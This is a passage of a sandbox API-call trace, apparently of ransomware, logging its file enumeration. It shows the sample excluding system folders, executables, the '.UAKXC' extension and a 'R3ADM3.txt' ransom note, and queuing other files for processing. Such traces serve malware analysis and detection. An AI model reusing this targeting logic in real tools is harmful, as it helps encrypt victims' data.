ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x4db80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXUTIL.DLL", cAlternateFileName="")) returned 1 [0159.335] lstrcmpW (lpString1="IXUTIL.DLL", lpString2=".") returned 1 [0159.335] lstrcmpW (lpString1="IXUTIL.DLL", lpString2="..") returned 1 [0159.335] StrStrIW (lpFirst="IXUTIL.DLL", lpSrch=".UAKXC") returned 0x0 [0159.335] StrStrIW (lpFirst="IXUTIL.DLL", lpSrch=".exe") returned 0x0 [0159.335] StrStrIW (lpFirst="IXUTIL.DLL", lpSrch=".dll") returned=".DLL" [0159.335] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e2cf00, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb7e2cf00, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x499c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JFONT.DAT", cAlternateFileName="")) returned 1 [0159.335] lstrcmpW (lpString1="JFONT.DAT", lpString2=".") returned 1 [0159.335] lstrcmpW (lpString1="JFONT.DAT", lpString2="..") returned 1 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".UAKXC") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".exe") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".dll") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".lnk") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".sys") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch=".msi") returned 0x0 [0159.335] StrStrIW (lpFirst="JFONT.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0159.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77921b0 [0159.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77921b0 | out: hHeap=0xea0000) returned 1 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77921b0 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9f38 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.336] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce9100, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3ce9100, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x89e6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LATIN1.SHP", cAlternateFileName="")) returned 1 [0159.336] lstrcmpW (lpString1="LATIN1.SHP", lpString2=".") returned 1 [0159.336] lstrcmpW (lpString1="LATIN1.SHP", lpString2="..") returned 1 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".UAKXC") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".exe") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".dll") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".lnk") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".sys") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch=".msi") returned 0x0 [0159.336] StrStrIW (lpFirst="LATIN1.SHP", lpSrch="R3ADM3.txt") returned 0x0 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77921d8 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.337] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.337] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77921d8 | out: hHeap=0xea0000) returned 1 [0159.337] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.337] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77921d8 [0159.337] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9fb0 [0159.337] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.337] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.337] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5d88a60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xaa570, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LGND.DLL", cAlternateFileName="")) returned 1 [0159.337] lstrcmpW (lpString1="LGND.DLL", lpString2=".") returned 1 [0159.337] lstrcmpW (lpString1="LGND.DLL", lpString2="..") returned 1 [0159.337] StrStrIW (lpFirst="LGND.DLL", lpSrch=".UAKXC") returned 0x0 [0159.337] StrStrIW (lpFirst="LGND.DLL", lpSrch=".exe") returned 0x0 [0159.337] StrStrIW (lpFirst="LGND.DLL", lpSrch=".dll") returned=".DLL" [0159.337] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x51fe2db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51fe2db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Library", cAlternateFileName="")) returned 1 [0159.337] lstrcmpW (lpString1="Library", lpString2=".") returned 1 [0159.337] lstrcmpW (lpString1="Library", lpString2="..") returned 1 [0159.337] StrStrIW (lpFirst="Library", lpSrch="tmp") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="winnt") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="temp") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="thumb") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="$Recycle.Bin") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="$RECYCLE.BIN") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="System Volume Information") returned 0x0 [0159.337] StrStrIW (lpFirst="Library", lpSrch="Boot") returned 0x0 [0159.338] StrStrIW (lpFirst="Library", lpSrch="Windows") returned 0x0 [0159.338] StrStrIW (lpFirst="Library", lpSrch="Trend Micro") returned 0x0 [0159.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792200 [0159.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.338] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5dfae80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xfafa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOGELEMS.DLL", cAlternateFileName="")) returned 1 [0159.338] lstrcmpW (lpString1="LOGELEMS.DLL", lpString2=".") returned 1 [0159.338] lstrcmpW (lpString1="LOGELEMS.DLL", lpString2="..") returned 1 [0159.338] StrStrIW (lpFirst="LOGELEMS.DLL", lpSrch=".UAKXC") returned 0x0 [0159.338] StrStrIW (lpFirst="LOGELEMS.DLL", lpSrch=".exe") returned 0x0 [0159.338] StrStrIW (lpFirst="LOGELEMS.DLL", lpSrch=".dll") returned=".DLL" [0159.338] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ab4f00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x82482540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb4ab4f00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0xb590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOGMODEL.MDL", cAlternateFileName="")) returned 1 [0159.339] lstrcmpW (lpString1="LOGMODEL.MDL", lpString2=".") returned 1 [0159.339] lstrcmpW (lpString1="LOGMODEL.MDL", lpString2="..") returned 1 [0159.339] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".UAKXC") returned 0x0 [0159.339] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".exe") returned 0x0 [0159.339] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".dll") returned 0x0 [0159.339] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".lnk") returned 0x0 [0159.339] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".sys") returned 0x0 [0159.340] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch=".msi") returned 0x0 [0159.340] StrStrIW (lpFirst="LOGMODEL.MDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792228 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792228 | out: hHeap=0xea0000) returned 1 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa028 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792228 [0159.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa0a0 [0159.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefa028 | out: hHeap=0xea0000) returned 1 [0159.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.340] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c850300, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5e93400, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1c850300, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x77da8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOGVIEW.DLL", cAlternateFileName="")) returned 1 [0159.352] lstrcmpW (lpString1="LOGVIEW.DLL", lpString2=".") returned 1 [0159.352] lstrcmpW (lpString1="LOGVIEW.DLL", lpString2="..") returned 1 [0159.352] StrStrIW (lpFirst="LOGVIEW.DLL", lpSrch=".UAKXC") returned 0x0 [0159.352] StrStrIW (lpFirst="LOGVIEW.DLL", lpSrch=".exe") returned 0x0 [0159.352] StrStrIW (lpFirst="LOGVIEW.DLL", lpSrch=".dll") returned=".DLL" [0159.352] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce9100, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x6960cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3ce9100, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOOKUP.DAT", cAlternateFileName="")) returned 1 [0159.352] lstrcmpW (lpString1="LOOKUP.DAT", lpString2=".") returned 1 [0159.352] lstrcmpW (lpString1="LOOKUP.DAT", lpString2="..") returned 1 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".UAKXC") returned 0x0 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".exe") returned 0x0 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".dll") returned 0x0 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".lnk") returned 0x0 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".sys") returned 0x0 [0159.352] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch=".msi") returned 0x0 [0159.353] StrStrIW (lpFirst="LOOKUP.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792250 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792250 | out: hHeap=0xea0000) returned 1 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa028 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792250 [0159.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa118 [0159.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefa028 | out: hHeap=0xea0000) returned 1 [0159.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.353] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ae6c00, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x582d2010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6ae6c00, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x65da0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MAPIPH.DLL", cAlternateFileName="")) returned 1 [0159.353] lstrcmpW (lpString1="MAPIPH.DLL", lpString2=".") returned 1 [0159.353] lstrcmpW (lpString1="MAPIPH.DLL", lpString2="..") returned 1 [0159.353] StrStrIW (lpFirst="MAPIPH.DLL", lpSrch=".UAKXC") returned 0x0 [0159.353] StrStrIW (lpFirst="MAPIPH.DLL", lpSrch=".exe") returned 0x0 [0159.353] StrStrIW (lpFirst="MAPIPH.DLL", lpSrch=".dll") returned=".DLL" [0159.353] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x473d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MAPISHELL.DLL", cAlternateFileName="MAPISH~1.DLL")) returned 1 [0159.353] lstrcmpW (lpString1="MAPISHELL.DLL", lpString2=".") returned 1 [0159.353] lstrcmpW (lpString1="MAPISHELL.DLL", lpString2="..") returned 1 [0159.353] StrStrIW (lpFirst="MAPISHELL.DLL", lpSrch=".UAKXC") returned 0x0 [0159.353] StrStrIW (lpFirst="MAPISHELL.DLL", lpSrch=".exe") returned 0x0 [0159.354] StrStrIW (lpFirst="MAPISHELL.DLL", lpSrch=".dll") returned=".DLL" [0159.354] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c44700, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8c44700, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x23570, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MCPS.DLL", cAlternateFileName="")) returned 1 [0159.354] lstrcmpW (lpString1="MCPS.DLL", lpString2=".") returned 1 [0159.354] lstrcmpW (lpString1="MCPS.DLL", lpString2="..") returned 1 [0159.354] StrStrIW (lpFirst="MCPS.DLL", lpSrch=".UAKXC") returned 0x0 [0159.354] StrStrIW (lpFirst="MCPS.DLL", lpSrch=".exe") returned 0x0 [0159.354] StrStrIW (lpFirst="MCPS.DLL", lpSrch=".dll") returned=".DLL" [0159.354] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40dec00, ftCreationTime.dwHighDateTime=0x1cb7010, ftLastAccessTime.dwLowDateTime=0xcf009660, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x40dec00, ftLastWriteTime.dwHighDateTime=0x1cb7010, nFileSizeHigh=0x0, nFileSizeLow=0xfdb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MEDCAT.DLL", cAlternateFileName="")) returned 1 [0159.354] lstrcmpW (lpString1="MEDCAT.DLL", lpString2=".") returned 1 [0159.354] lstrcmpW (lpString1="MEDCAT.DLL", lpString2="..") returned 1 [0159.354] StrStrIW (lpFirst="MEDCAT.DLL", lpSrch=".UAKXC") returned 0x0 [0159.354] StrStrIW (lpFirst="MEDCAT.DLL", lpSrch=".exe") returned 0x0 [0159.354] StrStrIW (lpFirst="MEDCAT.DLL", lpSrch=".dll") returned=".DLL" [0159.354] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x708e7550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x708e7550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MEDIA", cAlternateFileName="")) returned 1 [0159.354] lstrcmpW (lpString1="MEDIA", lpString2=".") returned 1 [0159.355] lstrcmpW (lpString1="MEDIA", lpString2="..") returned 1 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="tmp") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="winnt") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="temp") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="thumb") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="$Recycle.Bin") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="$RECYCLE.BIN") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="System Volume Information") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="Boot") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="Windows") returned 0x0 [0159.355] StrStrIW (lpFirst="MEDIA", lpSrch="Trend Micro") returned 0x0 [0159.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792278 [0159.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa028 [0159.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.355] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4f5000, ftCreationTime.dwHighDateTime=0x1cac037, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d4f5000, ftLastWriteTime.dwHighDateTime=0x1cac037, nFileSizeHigh=0x0, nFileSizeLow=0x1c798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BusinessData.dll", cAlternateFileName="MI5659~1.DLL")) returned 1 [0159.355] lstrcmpW (lpString1="Microsoft.BusinessData.dll", lpString2=".") returned 1 [0159.355] lstrcmpW (lpString1="Microsoft.BusinessData.dll", lpString2="..") returned 1 [0159.355] StrStrIW (lpFirst="Microsoft.BusinessData.dll", lpSrch=".UAKXC") returned 0x0 [0159.355] StrStrIW (lpFirst="Microsoft.BusinessData.dll", lpSrch=".exe") returned 0x0 [0159.355] StrStrIW (lpFirst="Microsoft.BusinessData.dll", lpSrch=".dll") returned=".dll" [0159.356] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c06100, ftCreationTime.dwHighDateTime=0x1ca24ad, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36c06100, ftLastWriteTime.dwHighDateTime=0x1ca24ad, nFileSizeHigh=0x0, nFileSizeLow=0x5a768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.BusinessData.xml", cAlternateFileName="MI1B7D~1.XML")) returned 1 [0159.356] lstrcmpW (lpString1="Microsoft.BusinessData.xml", lpString2=".") returned 1 [0159.356] lstrcmpW (lpString1="Microsoft.BusinessData.xml", lpString2="..") returned 1 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".UAKXC") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".exe") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".dll") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".lnk") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".sys") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch=".msi") returned 0x0 [0159.356] StrStrIW (lpFirst="Microsoft.BusinessData.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0159.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77922a0 [0159.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34fa8 [0159.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0159.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.356] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17441800, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x662b9570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17441800, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, 